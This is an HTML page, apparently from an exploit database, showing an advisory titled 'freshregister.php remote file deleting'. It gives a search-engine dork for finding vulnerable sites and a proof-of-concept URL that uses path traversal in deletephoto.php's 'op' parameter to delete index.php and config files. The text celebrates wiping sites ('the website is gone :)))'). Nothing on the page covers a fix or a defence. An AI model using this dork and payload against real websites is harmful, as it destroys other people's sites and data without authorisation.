<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-18</title>
    </head>
    <body>
        <center>
                <a  href="exploit-18" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
##############################################################################
# Title: freshregister.php remote file deleting 
# vendor: n/a
# Exploit Author : Guardiran Security Team
# Tested On : ubuntu / Windows 8.1
# 
# Dork: inurl:freshregister.php
# 
# -----------------------------------------------
#
#
# Description :
# an authenticated user profile pic remover can delete the whole website and config files 
# 
# 
# 
# Poc:
# http://sitedomain.com/deletephoto.php?Choice=1&op=../index.php
# and the website is gone :)))
# 
# 
# 
# 
# you can delete what ever you want such as pics or files :))
# 
# 
#
#
#
#
##############################################################################
        </pre>
    </body>
</html>